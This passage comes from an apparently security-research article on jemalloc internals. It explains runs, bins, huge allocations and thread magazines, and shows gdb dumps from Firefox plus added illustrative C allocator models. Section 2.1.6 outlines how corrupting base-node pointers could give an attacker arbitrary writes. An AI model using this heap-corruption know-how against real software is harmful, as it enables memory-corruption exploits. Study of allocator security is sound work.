     * region. A 0 bit means the region is used, and a 1 bit means the
     * corresponding region is free. The variable nextind (or regs_minelm
     * on FreeBSD and Firefox) is the index of the first non-zero element
     * of this array.
     */
    unsigned regs_mask[];
};


Don't forget to re-read the comments ;)


------[ 2.1.4 - Regions/Allocations

In jemalloc the term 'regions' applies to the end user memory areas
returned by malloc(3). As we have briefly mentioned earlier, regions are
divided into three classes according to their size, namely a) small/medium,
b) large and c) huge.

Huge regions are considered those that are bigger than the chunk size minus
the size of some jemalloc headers. For example, in the case that the chunk
size is 4 MB (4096 KB) then a huge region is an allocation greater than
4078 KB. Small/medium are the regions that are smaller than a page. Large
are the regions that are smaller than the huge regions (chunk size minus
some headers) and also larger than the small/medium regions (page size).

Huge regions have their own metadata and are managed separately from
small/medium and large regions. Specifically, they are managed by a
red-black tree that is global to the allocator, and they have their own
dedicated and contiguous chunks. Large regions have their own runs, that
is, each large allocation has a dedicated run. Their metadata are situated
on the corresponding arena chunk header. Small/medium regions are placed
on different runs according to their specific size. As we have seen in
2.1.3, each run has its own header in which there is a bitmask array
specifying the free and the used regions in the run.

In the standalone flavor of jemalloc the smallest run is that for regions
of size 4 bytes. The next run is for regions of size 8 bytes, the next
for 16 bytes, and so on.

When we do not mention it specifically, we deal with small/medium and
large region classes. We investigate the huge region size class separately
in subsection 2.1.6.


------[ 2.1.5 - Bins (arena_bin_t)

Bins are used by jemalloc to store free regions. Bins organize the free
regions via runs and also keep metadata about their regions, like for
example the size class, the total number of regions, etc. A specific bin
may be associated with several runs; however, a specific run can only be
associated with a specific bin, i.e. there is a one-to-many correspondence
between bins and runs. Bins have their associated runs organized in a tree.

Each bin has an associated size class and stores/manages regions of this
size class. A bin's regions are managed and accessed through the bin's
runs. Each bin has a member element representing the most recently used run
of the bin, called 'current run' with the variable name runcur. A bin also
has a tree of runs with available/free regions. This tree is used when the
current run of the bin is full, that is it doesn't have any free regions.

A bin structure is defined as follows:


[2-4]

typedef struct arena_bin_s arena_bin_t;
struct arena_bin_s
{
    /*
     * Operations on the runs (including the current run) of the bin
     * are protected via this mutex.
     */
    malloc_mutex_t lock;

    /*
     * The current run of the bin that manages regions of this bin's size
     * class.
     */
    arena_run_t *runcur;

    /*
     * The tree of the bin's associated runs (all responsible for regions
     * of this bin's size class of course).
     */
    arena_run_tree_t runs;

    /* The size of this bin's regions. */
    size_t reg_size;
    
    /*
     * The total size of a run of this bin. Remember that each run may be
     * comprised of more than one page.
     */
    size_t run_size;
    
    /* The total number of regions in a run of this bin. */
    uint32_t nregs;
    
    /*
     * The total number of elements in the regs_mask array of a run of this
     * bin. See 2.1.3 for more information on regs_mask.
     */
    uint32_t regs_mask_nelms;
    
    /*
     * The offset of the first region in a run of this bin. This can be 
     * non-zero due to alignment requirements.
     */
    uint32_t reg0_offset;
};
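
To tie the run bitmask of 2.1.3 to the layout fields of the bin structure
above, here is an added example (written for illustration; it is neither
jemalloc code nor part of the article's code archive) of a toy run that hands
out and takes back regions through regs_mask. The toy_* types, the constructed
16-byte bin and the sanity checks in run_reg_dalloc() are assumptions;
treating nextind as a mask element index follows the regs_mask comment in
2.1.3.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MASK_BITS 32u   /* bits per regs_mask element (32-bit unsigned assumed) */
#define MAX_NELMS 8u    /* toy limit; the real array is dynamically sized */

/* The arena_bin_t fields that describe the layout of a run. */
typedef struct {
    size_t   reg_size;
    size_t   run_size;
    uint32_t nregs;
    uint32_t regs_mask_nelms;
    uint32_t reg0_offset;
} toy_bin_t;

/* Toy arena_run_t: the header sits at the very start of the run's memory. */
typedef struct {
    const toy_bin_t *bin;
    uint32_t nextind;               /* lowest mask element that may be non-zero */
    unsigned nfree;
    unsigned regs_mask[MAX_NELMS];  /* 1 = free, 0 = used */
} toy_run_t;

/* Constructed sample bin: 16-byte regions in a one-page run.
 * (4096 - 64) / 16 = 252 regions, tracked by ceil(252 / 32) = 8 elements. */
static const toy_bin_t bin16 = { 16, 4096, 252, 8, 64 };
static union { toy_run_t hdr; unsigned char bytes[4096]; } run_mem;

toy_run_t *run_init(void *mem, const toy_bin_t *bin)
{
    toy_run_t *run = mem;
    uint32_t i;

    run->bin = bin;
    run->nextind = 0;
    run->nfree = bin->nregs;
    memset(run->regs_mask, 0, sizeof(run->regs_mask));
    for (i = 0; i < bin->nregs; i++)        /* every region starts out free */
        run->regs_mask[i / MASK_BITS] |= 1u << (i % MASK_BITS);
    return run;
}

/* Hand out the lowest-indexed free region, or NULL if the run is full. */
void *run_reg_alloc(toy_run_t *run)
{
    const toy_bin_t *bin = run->bin;
    uint32_t elm, bit;

    for (elm = run->nextind; elm < bin->regs_mask_nelms; elm++) {
        unsigned mask = run->regs_mask[elm];
        if (mask == 0)
            continue;                        /* all 32 regions here are used */
        for (bit = 0; !(mask & (1u << bit)); bit++)
            ;                                /* find the lowest set bit */
        run->regs_mask[elm] = mask & ~(1u << bit);
        run->nfree--;
        run->nextind = elm;                  /* lower elements are exhausted */
        return (unsigned char *)run + bin->reg0_offset
            + (size_t)(elm * MASK_BITS + bit) * bin->reg_size;
    }
    return NULL;
}

/* Give a region back. Returns 0 on success and -1 when ptr is not a region
 * of this run or is already free (these checks are an added illustration). */
int run_reg_dalloc(toy_run_t *run, void *ptr)
{
    const toy_bin_t *bin = run->bin;
    uintptr_t first = (uintptr_t)run + bin->reg0_offset;
    uintptr_t p = (uintptr_t)ptr;
    size_t regind;
    unsigned bit;

    if (p < first || (p - first) % bin->reg_size != 0)
        return -1;                           /* not on a region boundary */
    regind = (p - first) / bin->reg_size;
    if (regind >= bin->nregs)
        return -1;                           /* past the last region */
    bit = 1u << (regind % MASK_BITS);
    if (run->regs_mask[regind / MASK_BITS] & bit)
        return -1;                           /* bit already 1: double free */
    run->regs_mask[regind / MASK_BITS] |= bit;
    run->nfree++;
    if (regind / MASK_BITS < run->nextind)
        run->nextind = (uint32_t)(regind / MASK_BITS);
    return 0;
}

int main(void)
{
    toy_run_t *run = run_init(run_mem.bytes, &bin16);
    void *a = run_reg_alloc(run);
    int first = run_reg_dalloc(run, a);     /* 0: accepted */
    int second = run_reg_dalloc(run, a);    /* -1: region is already free */

    printf("a=%p first=%d second=%d nfree=%u\n", a, first, second, run->nfree);
    return 0;
}
```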


As an example, consider the following three allocations and that the
jemalloc flavor under investigation has 2 bytes as the smallest possible
allocation size (file test-bins.c in the code archive, example run on
FreeBSD):


one = malloc(2);
two = malloc(8);
three = malloc(16);


Using gdb let's explore jemalloc's structures. First let's see the runs
that the above allocations created in their corresponding bins:


gdb $ print arenas[0].bins[0].runcur
$25 = (arena_run_t *) 0xb7d01000
gdb $ print arenas[0].bins[1].runcur
$26 = (arena_run_t *) 0x0
gdb $ print arenas[0].bins[2].runcur
$27 = (arena_run_t *) 0xb7d02000
gdb $ print arenas[0].bins[3].runcur
$28 = (arena_run_t *) 0xb7d03000
gdb $ print arenas[0].bins[4].runcur
$29 = (arena_run_t *) 0x0


Now let's see the size classes of these bins:


gdb $ print arenas[0].bins[0].reg_size
$30 = 0x2
gdb $ print arenas[0].bins[1].reg_size
$31 = 0x4
gdb $ print arenas[0].bins[2].reg_size
$32 = 0x8
gdb $ print arenas[0].bins[3].reg_size
$33 = 0x10
gdb $ print arenas[0].bins[4].reg_size
$34 = 0x20


We can see that our three allocations of sizes 2, 8 and 16 bytes resulted
in jemalloc creating runs for these size classes. Specifically, 'bin[0]'
is responsible for the size class 2 and its current run is at 0xb7d01000,
'bin[1]' is responsible for the size class 4 and doesn't have a current
run since no allocations of size 4 were made, 'bin[2]' is responsible
for the size class 8 with its current run at 0xb7d02000, and so on. In the
code archive you can find a Python script for gdb named unmask_jemalloc.py
for easily enumerating the size of bins and other internal information in
the various jemalloc flavors (see 2.1.8 for a sample run).

At this point we should mention that in jemalloc an allocation of zero
bytes (that is a malloc(0) call) will return a region of the smallest size
class; in the above example a region of size 2. The smallest size class
depends on the flavor of jemalloc. For example, in the standalone flavor it
is 4 bytes.

The following diagram summarizes our analysis of jemalloc up to this point:

   .----------------------------------.       .---------------------------.
 .----------------------------------. |    +--+-----> arena_chunk_t       |
.---------------------------------. | |    |  |                           |
|             arena_t             | | |    |  |  .---------------------.  |
|                                 | | |    |  |  |                     |  |
| .--------------------.          | | |    |  |  |     arena_run_t     |  |
| | arena_chunk_t list |-----+    | | |    |  |  |                     |  |
| `--------------------'     |    | | |    |  |  |    .-----------.    |  |
|                            |    | | |    |  |  |    |   page    |    |  |
|   arena_bin_t bins[];      |    | | |    |  |  |    +-----------+    |  |
| .------------------------. |    | | |    |  |  |    |  region   |    |  |
| | bins[0]  ...  bins[27] | |    | | |    |  |  |    +-----------+    |  |
| `------------------------' |    | |.'    |  |  |    |  region   |    |  |
|     |                      |    |.'      |  |  |    +-----------+    |  |
`-----+----------------------+----'        |  |  |    |  region   |    |  |
      |                      |             |  |  |    +-----------+    |  |
      |                      |             |  |  |        . . .        |  |
      |                      v             |  |  |    .-----------.    |  |
      |            .-------------------.   |  |  |    |   page    |    |  |
      |            | .---------------. |   |  |  |    +-----------+    |  |
      |            | | arena_chunk_t |-+---+  |  |    |  region   |    |  |
      |            | `---------------' |      |  |    +-----------+    |  |
      |     [2-5]  | .---------------. |      |  |    |  region   |    |  |
      |            | | arena_chunk_t | |      |  |    +-----------+    |  |
      |            | `---------------' |      |  |    |  region   |    |  |
      |            |       . . .       |      |  |    +-----------+    |  |
      |            | .---------------. |      |  |                     |  |
      |            | | arena_chunk_t | |      |  `---------------------'  |
      |            | `---------------' |      |          [2-6]            |
      |            |       . . .       |      |  .---------------------.  |
      |            `-------------------'      |  |                     |  |
      |                                  +----+--+---> arena_run_t     |  |
      |                                  |    |  |                     |  |
      +----------+                       |    |  |    .-----------.    |  |
                 |                       |    |  |    |   page    |    |  |
                 |                       |    |  |    +-----------+    |  |
                 |                       |    |  |    |  region   |    |  |
                 v                       |    |  |    +-----------+    |  |
    .--------------------------.         |    |  |    |  region   |    |  |
    |       arena_bin_t        |         |    |  |    +-----------+    |  |
    |     bins[0] (size 8)     |         |    |  |    |  region   |    |  |
    |                          |         |    |  |    +-----------+    |  |
    | .----------------------. |         |    |  |        . . .        |  |
    | | arena_run_t *runcur; |-+---------+    |  |    .-----------.    |  |
    | `----------------------' |              |  |    |   page    |    |  |
    `--------------------------'              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |    |  region   |    |  |
                                              |  |    +-----------+    |  |
                                              |  |                     |  |
                                              |  `---------------------'  |
                                              `---------------------------'


------[ 2.1.6 - Huge allocations

Huge allocations are not very interesting for the attacker but they are an
integral part of jemalloc which may affect the exploitation process. Simply
put, huge allocations are represented by 'extent_node_t' structures that 
are ordered in a global red black tree which is common to all threads.


[2-7]

/* Tree of extents. */
typedef struct extent_node_s extent_node_t;
struct extent_node_s {
    #ifdef MALLOC_DSS
        /* Linkage for the size/address-ordered tree. */
        rb_node(extent_node_t) link_szad;
    #endif

    /* Linkage for the address-ordered tree. */
    rb_node(extent_node_t) link_ad;

    /* Pointer to the extent that this tree node is responsible for. */
    void *addr;

    /* Total region size. */
    size_t size;
};
typedef rb_tree(extent_node_t) extent_tree_t;


The 'extent_node_t' structures are allocated in small memory regions
called base nodes. Base nodes do not affect the layout of end user heap
allocations since they are served either by the DSS or by individual
memory mappings acquired by 'mmap()'. The actual method used to allocate
free space depends on how jemalloc was compiled with 'mmap()' being
the default.


/* Allocate an extent node with which to track the chunk. */
node = base_node_alloc();
...

ret = chunk_alloc(csize, zero);
...

/* Insert node into huge. */
node->addr = ret;
node->size = csize;
...

malloc_mutex_lock(&huge_mtx);
extent_tree_ad_insert(&huge, node);


The most interesting thing about huge allocations is the fact that free
base nodes are kept in a simple array of pointers called 'base_nodes'. The
aforementioned array, although defined as a simple pointer, is handled
as if it were a two dimensional array holding pointers to available base
nodes.


static extent_node_t *base_nodes;
...

static extent_node_t *
base_node_alloc(void)
{
    extent_node_t *ret;

    malloc_mutex_lock(&base_mtx);
    if (base_nodes != NULL) {
        ret = base_nodes;
        base_nodes = *(extent_node_t **)ret;
        ...
    }
    ...
}

static void
base_node_dealloc(extent_node_t *node)
{
    malloc_mutex_lock(&base_mtx);
    *(extent_node_t **)node = base_nodes;
    base_nodes = node;
    ...
}


Taking into account how 'base_node_alloc()' works, it's obvious that if
an attacker corrupts the pages that contain the base node pointers, she
can force jemalloc to use an arbitrary address as a base node pointer. This
itself can lead to interesting scenarios but they are out of the scope
of this article since the chances of achieving something like this are
quite low. Nevertheless, a quick review of the code reveals that one
may be able to achieve this goal by forcing huge allocations once she
controls the physically last region of an arena. The attack is possible
if and only if the mappings that will hold the base pointers are allocated
right after the attacker controlled region.

A careful reader would have noticed that if an attacker manages to pass
a controlled value as the first argument to 'base_node_dealloc()' she
can get a '4bytes anywhere' result. Unfortunately, as far as the authors
can see, this is possible only if the global red black tree holding the
huge allocations is corrupted. This situation is far more difficult to
achieve than the one described in the previous paragraph. Nevertheless,
we would really like to hear from anyone that manages to do so.


------[ 2.1.7 - Thread caches (tcache_t)

In the previous paragraphs we mentioned how jemalloc allocates new arenas
at will in order to avoid lock contention. In this section we will focus on
the mechanisms that are activated on multicore systems and multithreaded
programs.

Let's set the following straight:

1) A multicore system is the reason jemalloc allocates more than one arena.
On a unicore system there's only one available arena, even on multithreaded
applications. However, the Firefox jemalloc variant has just one arena
hardcoded, therefore it has no thread caches.

2) On a multicore system, even if the target application runs on a single
thread, more than one arena is used.

No matter what the number of cores on the system is, a multithreaded
application utilizing jemalloc will make use of the so called 'magazines'
(also called 'tcaches' on newer versions of jemalloc). Magazines (tcaches)
are thread local structures used to avoid thread blocking problems.
Whenever a thread wishes to allocate a memory region, jemalloc will use
those thread specific data structures instead of following the normal code
path.


void *
arena_malloc(arena_t *arena, size_t size, bool zero)
{
    ...

    if (size <= bin_maxclass) {
#ifdef MALLOC_MAG
        if (__isthreaded && opt_mag) {
            mag_rack_t *rack = mag_rack;
            if (rack == NULL) {
                /* First allocation on this thread: create its rack. */
                rack = mag_rack_create(arena);
                ...
            }

            /* Serve the request from the thread's magazine rack. */
            return (mag_rack_alloc(rack, size, zero));
        } else
#endif
            return (arena_malloc_small(arena, size, zero));
    }
    ...
}


The 'opt_mag' variable is true by default. The variable '__isthreaded' is
exported by 'libthr', the pthread implementation for FreeBSD, and is set to
1 on a call to 'pthread_create()'. Obviously, the rest of the details are
out of the scope of this article.

In this section we will analyze thread magazines, but the exact same
principles apply on the tcaches (the change in the nomenclature is probably
the most notable difference between them).

The behavior of thread magazines is affected by the following macros that
are _defined_:

  MALLOC_MAG - Make use of thread magazines.

  MALLOC_BALANCE - Balance arena usage using a simple linear random number
  generator (have a look at 'choose_arena()').

The following constants are _undefined_:

  NO_TLS - TLS _is_ available on __i386__

Furthermore, 'opt_mag', the jemalloc runtime option controlling thread
magazine usage, is, as we mentioned earlier, enabled by default.

The following figure depicts the relationship between the various thread
magazines' structures.


.-------------------------------------------.
|                mag_rack_t                 |
|                                           |
|           bin_mags_t bin_mags[];          |
|                                           |
|  .-------------------------------------.  |
|  | bin_mags[0] ... bin_mags[nbins - 1] |  |
|  `-------------------------------------'  |
`--------|----------------------------------'
         |
         |                                   .------------------.
         |                      +----------->|      mag_t       |
         v                      |            |                  |
.----------------------.        |            |  void *rounds[]  |
|      bin_mags_t      |        |            |       ...        |
|                      |        |            `------------------'
|  .----------------.  |        |
|  | mag_t *curmag; |-----------+
|  `----------------'  |
|         ...          |
`----------------------'


The core of the aforementioned thread local metadata is the 'mag_rack_t'. A
'mag_rack_t' is a simplified equivalent of an arena. It is composed of a
single array of 'bin_mags_t' structures. Each thread in a program is
associated with a private 'mag_rack_t' which has a lifetime equal to the
application's.


typedef struct mag_rack_s mag_rack_t;
struct mag_rack_s {
    bin_mags_t bin_mags[1]; /* Dynamically sized. */
};


Bins belonging to magazine racks are represented by 'bin_mags_t' structures
(notice the plural form).


/*
 * Magazines are lazily allocated, but once created, they remain until the
 * associated mag_rack is destroyed.
 */
typedef struct bin_mags_s bin_mags_t;
struct bin_mags_s {
    mag_t *curmag;
    mag_t *sparemag;
};

typedef struct mag_s mag_t;
struct mag_s {
    size_t binind; /* Index of associated bin. */
    size_t nrounds;
    void *rounds[1]; /* Dynamically sized. */
};


Just like a normal bin is associated with a run, a 'bin_mags_t' structure
is associated with a magazine pointed to by 'curmag' (recall 'runcur'). A
magazine is nothing more than a simple array of void pointers which hold
memory addresses of preallocated memory regions which are exclusively used
by a single thread. Magazines are populated in function 'mag_load()' as
seen below.


void
mag_load(mag_t *mag)
{
    arena_t *arena;
    arena_bin_t *bin;
    arena_run_t *run;
    void *round;
    size_t i;

    /* Pick a random arena and the bin responsible for servicing
     * the required size class.
     */
    arena = choose_arena();
    bin = &arena->bins[mag->binind];
    ...

    for (i = mag->nrounds; i < max_rounds; i++) {
        ...

        if ((run = bin->runcur) != NULL && run->nfree > 0)
            round = arena_bin_malloc_easy(arena, bin, run); /* [3-23] */
        else
            round = arena_bin_malloc_hard(arena, bin); /* [3-24] */

        if (round == NULL)
            break;

        /* Each 'rounds' holds a preallocated memory region. */
        mag->rounds[i] = round;
    }

    ...
    mag->nrounds = i;
}


When a thread calls 'malloc()', the call chain eventually reaches
'mag_rack_alloc()' and then 'mag_alloc()'.


/* Just return the next available void pointer. It points to one of the
 * preallocated memory regions.
 */
void *
mag_alloc(mag_t *mag)
{
    if (mag->nrounds == 0)
        return (NULL);
    mag->nrounds--;

    return (mag->rounds[mag->nrounds]);
}


The most notable thing about magazines is the fact that 'rounds', the array
of void pointers, as well as all the related thread metadata (magazine
racks, magazine bins and so on) are allocated by normal calls to functions
'arena_bin_malloc_xxx()' ([3-23], [3-24]). This results in the thread
metadata lying around normal memory regions.


------[ 2.1.8 - Unmask jemalloc

As we are sure you are all aware, since version 7.0, gdb can be scripted
with Python. In order to unmask and bring to light the internals of the
various jemalloc flavors, we have developed a Python script for gdb
appropriately named unmask_jemalloc.py. The following is a sample run of
the script on Firefox 11.0 on Linux x86 (edited for readability):


$ ./firefox-bin &

$ gdb -x ./gdbinit -p `ps x | grep firefox | grep -v grep \
| grep -v debug | awk '{print $1}'`

GNU gdb (GDB) 7.4-debian
...
Attaching to process 3493
add symbol table from file "/dbg/firefox-latest-symbols/firefox-bin.dbg" at
    .text_addr = 0x80494b0
add symbol table from file "/dbg/firefox-latest-symbols/libxul.so.dbg" at
    .text_addr = 0xb5b9a9d0
...
[Thread 0xa4ffdb70 (LWP 3533) exited]
[Thread 0xa57feb70 (LWP 3537) exited]
[New Thread 0xa57feb70 (LWP 3556)]
[Thread 0xa57feb70 (LWP 3556) exited]

gdb $ source unmask_jemalloc.py
gdb $ unmask_jemalloc runs

[jemalloc] [number of arenas:       1]
[jemalloc] [number of bins:         24]
[jemalloc] [no magazines/thread caches detected]

[jemalloc] [arena #00] [bin #00] [region size: 0x0004]
                                            [current run at: 0xa52d9000]
[jemalloc] [arena #00] [bin #01] [region size: 0x0008]
                                            [current run at: 0xa37c8000]
[jemalloc] [arena #00] [bin #02] [region size: 0x0010]
                                            [current run at: 0xa372c000]
[jemalloc] [arena #00] [bin #03] [region size: 0x0020]
                                            [current run at: 0xa334d000]
[jemalloc] [arena #00] [bin #04] [region size: 0x0030]
                                            [current run at: 0xa3347000]
[jemalloc] [arena #00] [bin #05] [region size: 0x0040]
                                            [current run at: 0xa334a000]
[jemalloc] [arena #00] [bin #06] [region size: 0x0050]
                                            [current run at: 0xa3732000]
[jemalloc] [arena #00] [bin #07] [region size: 0x0060]
                                            [current run at: 0xa3701000]
[jemalloc] [arena #00] [bin #08] [region size: 0x0070]
                                            [current run at: 0xa3810000]
[jemalloc] [arena #00] [bin #09] [region size: 0x0080]
                                            [current run at: 0xa3321000]
[jemalloc] [arena #00] [bin #10] [region size: 0x00f0]
                                            [current run at: 0xa57c7000]
[jemalloc] [arena #00] [bin #11] [region size: 0x0100]
                                            [current run at: 0xa37e9000]
[jemalloc] [arena #00] [bin #12] [region size: 0x0110]
                                            [current run at: 0xa5a9b000]
[jemalloc] [arena #00] [bin #13] [region size: 0x0120]
                                            [current run at: 0xa56ea000]
[jemalloc] [arena #00] [bin #14] [region size: 0x0130]
                                            [current run at: 0xa3709000]
[jemalloc] [arena #00] [bin #15] [region size: 0x0140]
                                            [current run at: 0xa382c000]
[jemalloc] [arena #00] [bin #16] [region size: 0x0150]
                                            [current run at: 0xa39da000]
[jemalloc] [arena #00] [bin #17] [region size: 0x0160]
                                            [current run at: 0xa56ee000]
[jemalloc] [arena #00] [bin #18] [region size: 0x0170]
                                            [current run at: 0xa3849000]
[jemalloc] [arena #00] [bin #19] [region size: 0x0180]
                                            [current run at: 0xa3a21000]
[jemalloc] [arena #00] [bin #20] [region size: 0x01f0]
                                            [current run at: 0xafc51000]
[jemalloc] [arena #00] [bin #21] [region size: 0x0200]
                                            [current run at: 0xa3751000]
[jemalloc] [arena #00] [bin #22] [region size: 0x0400]
                                            [current run at: 0xa371d000]
[jemalloc] [arena #00] [bin #23] [region size: 0x0800]
                                            [current run at: 0xa370d000]

[jemalloc] [run 0xa3347000] [from 0xa3347000 to 0xa3348000L] 
[jemalloc] [run 0xa371d000] [from 0xa371d000 to 0xa3725000L] 
[jemalloc] [run 0xa3321000] [from 0xa3321000 to 0xa3323000L] 
[jemalloc] [run 0xa334a000] [from 0xa334a000 to 0xa334b000L] 
[jemalloc] [run 0xa370d000] [from 0xa370d000 to 0xa3715000L] 
[jemalloc] [run 0xa3709000] [from 0xa3709000 to 0xa370d000L] 
[jemalloc] [run 0xa37c8000] [from 0xa37c8000 to 0xa37c9000L] 
[jemalloc] [run 0xa5a9b000] [from 0xa5a9b000 to 0xa5a9f000L] 
[jemalloc] [run 0xa3a21000] [from 0xa3a21000 to 0xa3a27000L] 
[jemalloc] [run 0xa382c000] [from 0xa382c000 to 0xa3831000L] 
[jemalloc] [run 0xa3701000] [from 0xa3701000 to 0xa3702000L] 
[jemalloc] [run 0xa57c7000] [from 0xa57c7000 to 0xa57ca000L] 
[jemalloc] [run 0xa56ee000] [from 0xa56ee000 to 0xa56f3000L] 
[jemalloc] [run 0xa39da000] [from 0xa39da000 to 0xa39df000L] 
[jemalloc] [run 0xa37e9000] [from 0xa37e9000 to 0xa37ed000L] 
[jemalloc] [run 0xa3810000] [from 0xa3810000 to 0xa3812000L] 
[jemalloc] [run 0xa3751000] [from 0xa3751000 to 0xa3759000L] 
[jemalloc] [run 0xafc51000] [from 0xafc51000 to 0xafc58000L] 
[jemalloc] [run 0xa334d000] [from 0xa334d000 to 0xa334e000L] 
[jemalloc] [run 0xa372c000] [from 0xa372c000 to 0xa372d000L] 
[jemalloc] [run 0xa52d9000] [from 0xa52d9000 to 0xa52da000L] 
[jemalloc] [run 0xa56ea000] [from 0xa56ea000 to 0xa56ee000L] 
[jemalloc] [run 0xa3732000] [from 0xa3732000 to 0xa3733000L] 
[jemalloc] [run 0xa3849000] [from 0xa3849000 to 0xa384e000L] 


There is also preliminary support for Mac OS X (x86_64), tested on Lion
10.7.3 with Firefox 11.0. Also, note that Apple's gdb does not have Python
scripting support, so the following was obtained with a custom-compiled
gdb:


$ open firefox-11.0.app

$ gdb -nx -x ./gdbinit -p 837

...
Attaching to process 837
[New Thread 0x2003 of process 837]
[New Thread 0x2103 of process 837]
[New Thread 0x2203 of process 837]
[New Thread 0x2303 of process 837]
[New Thread 0x2403 of process 837]
[New Thread 0x2503 of process 837]
[New Thread 0x2603 of process 837]
[New Thread 0x2703 of process 837]
[New Thread 0x2803 of process 837]
[New Thread 0x2903 of process 837]
[New Thread 0x2a03 of process 837]
[New Thread 0x2b03 of process 837]
[New Thread 0x2c03 of process 837]
[New Thread 0x2d03 of process 837]
[New Thread 0x2e03 of process 837]
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox...done
Reading symbols from
/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
Contents/Resources/DWARF/firefox...done.
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
(gdb) source unmask_jemalloc.py
(gdb) unmask_jemalloc

[jemalloc] [number of arenas:       1]
[jemalloc] [number of bins:         35]
[jemalloc] [no magazines/thread caches detected]

[jemalloc] [arena #00] [bin #00] [region size: 0x0008]
                                            [current run at: 0x108fe0000]
[jemalloc] [arena #00] [bin #01] [region size: 0x0010]
                                            [current run at: 0x1003f5000]
[jemalloc] [arena #00] [bin #02] [region size: 0x0020]
                                            [current run at: 0x1003bc000]
[jemalloc] [arena #00] [bin #03] [region size: 0x0030]
                                            [current run at: 0x1003d7000]
[jemalloc] [arena #00] [bin #04] [region size: 0x0040]
                                            [current run at: 0x1054c6000]
[jemalloc] [arena #00] [bin #05] [region size: 0x0050]
                                            [current run at: 0x103652000]
[jemalloc] [arena #00] [bin #06] [region size: 0x0060]
                                            [current run at: 0x110c9c000]
[jemalloc] [arena #00] [bin #07] [region size: 0x0070]
                                            [current run at: 0x106bef000]
[jemalloc] [arena #00] [bin #08] [region size: 0x0080]
                                            [current run at: 0x10693b000]
[jemalloc] [arena #00] [bin #09] [region size: 0x0090]
                                            [current run at: 0x10692e000]
[jemalloc] [arena #00] [bin #10] [region size: 0x00a0]
                                            [current run at: 0x106743000]
[jemalloc] [arena #00] [bin #11] [region size: 0x00b0]
                                            [current run at: 0x109525000]
[jemalloc] [arena #00] [bin #12] [region size: 0x00c0]
                                            [current run at: 0x1127c2000]
[jemalloc] [arena #00] [bin #13] [region size: 0x00d0]
                                            [current run at: 0x106797000]
[jemalloc] [arena #00] [bin #14] [region size: 0x00e0]
                                            [current run at: 0x109296000]
[jemalloc] [arena #00] [bin #15] [region size: 0x00f0]
                                            [current run at: 0x110aa9000]
[jemalloc] [arena #00] [bin #16] [region size: 0x0100]
                                            [current run at: 0x106c70000]
[jemalloc] [arena #00] [bin #17] [region size: 0x0110]
                                            [current run at: 0x109556000]
[jemalloc] [arena #00] [bin #18] [region size: 0x0120]
                                            [current run at: 0x1092bf000]
[jemalloc] [arena #00] [bin #19] [region size: 0x0130]
                                            [current run at: 0x1092a2000]
[jemalloc] [arena #00] [bin #20] [region size: 0x0140]
                                            [current run at: 0x10036a000]
[jemalloc] [arena #00] [bin #21] [region size: 0x0150]
                                            [current run at: 0x100353000]
[jemalloc] [arena #00] [bin #22] [region size: 0x0160]
                                            [current run at: 0x1093d3000]
[jemalloc] [arena #00] [bin #23] [region size: 0x0170]
                                            [current run at: 0x10f024000]
[jemalloc] [arena #00] [bin #24] [region size: 0x0180]
                                            [current run at: 0x106b58000]
[jemalloc] [arena #00] [bin #25] [region size: 0x0190]
                                            [current run at: 0x10f002000]
[jemalloc] [arena #00] [bin #26] [region size: 0x01a0]
                                            [current run at: 0x10f071000]
[jemalloc] [arena #00] [bin #27] [region size: 0x01b0]
                                            [current run at: 0x109139000]
[jemalloc] [arena #00] [bin #28] [region size: 0x01c0]
                                            [current run at: 0x1091c6000]
[jemalloc] [arena #00] [bin #29] [region size: 0x01d0]
                                            [current run at: 0x10032a000]
[jemalloc] [arena #00] [bin #30] [region size: 0x01e0]
                                            [current run at: 0x1054f9000]
[jemalloc] [arena #00] [bin #31] [region size: 0x01f0]
                                            [current run at: 0x10034c000]
[jemalloc] [arena #00] [bin #32] [region size: 0x0200]
                                            [current run at: 0x106739000]
[jemalloc] [arena #00] [bin #33] [region size: 0x0400]
                                            [current run at: 0x106c68000]
[jemalloc] [arena #00] [bin #34] [region size: 0x0800]
                                            [current run at: 0x10367e000]


We did our best to test unmask_jemalloc.py on all jemalloc variants,
however there are probably some bugs left. Feel free to test it and send us
patches. The development of unmask_jemalloc.py will continue at [UJEM].


----[ 2.2 - Algorithms

In this section we present pseudocode that describes the allocation and
deallocation algorithms implemented by jemalloc. We start with malloc():


MALLOC(size):
    IF size CAN BE SERVICED BY AN ARENA:
        IF size IS SMALL OR MEDIUM:
            bin = get_bin_for_size(size)

            IF bin->runcur EXISTS AND NOT FULL:
                run = bin->runcur
            ELSE:
                run = lookup_or_allocate_nonfull_run()
                bin->runcur = run

            bit = get_first_set_bit(run->regs_mask)
            region = get_region(run, bit)

        ELIF size IS LARGE:
            region = allocate_new_run()
    ELSE:
        region = allocate_new_chunk()
    RETURN region


calloc() is as you would expect:


CALLOC(n, size):
    RETURN MALLOC(n * size)


Finally, the pseudocode for free():


FREE(addr):
    IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS TO:
        IF addr IS A SMALL ALLOCATION:
            run = get_run_addr_belongs_to(addr)
            bin = run->bin
            size = bin->reg_size
            element = get_element_index(addr, run, bin)
            set_bit(run->regs_mask, element) /* a set bit marks a free region */

        ELSE: /* addr is a large allocation */
            run = get_run_addr_belongs_to(addr)
            chunk = get_chunk_run_belongs_to(run)
            run_index = get_run_index(run, chunk)
            mark_pages_of_run_as_free(run_index)

            IF ALL THE PAGES OF chunk ARE MARKED AS FREE:
                unmap_the_chunk_s_pages(chunk)

    ELSE: /* this is a huge allocation */
        unmap_the_huge_allocation_s_pages(addr)
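
The small-allocation paths of MALLOC and FREE above, as an added C model of
a single run (not jemalloc source and not part of the original article). The
constants are read off the size-class-16 run dumped in section 3.1 (0x30-byte
header, 253 regions, last mask word 0x1fffffff); the type and function names,
and the two rejections in run_free(), are assumptions of the model.

```c
/* Added model of one jemalloc small run (size class 16); not jemalloc code. */
#include <stdint.h>
#include <stdio.h>

#define HDR_SIZE   0x30u  /* offset of the first region in the page's dump */
#define REG_SIZE   0x10u  /* region size of the bin */
#define NREGS      253u   /* (0x1000 - HDR_SIZE) / REG_SIZE */
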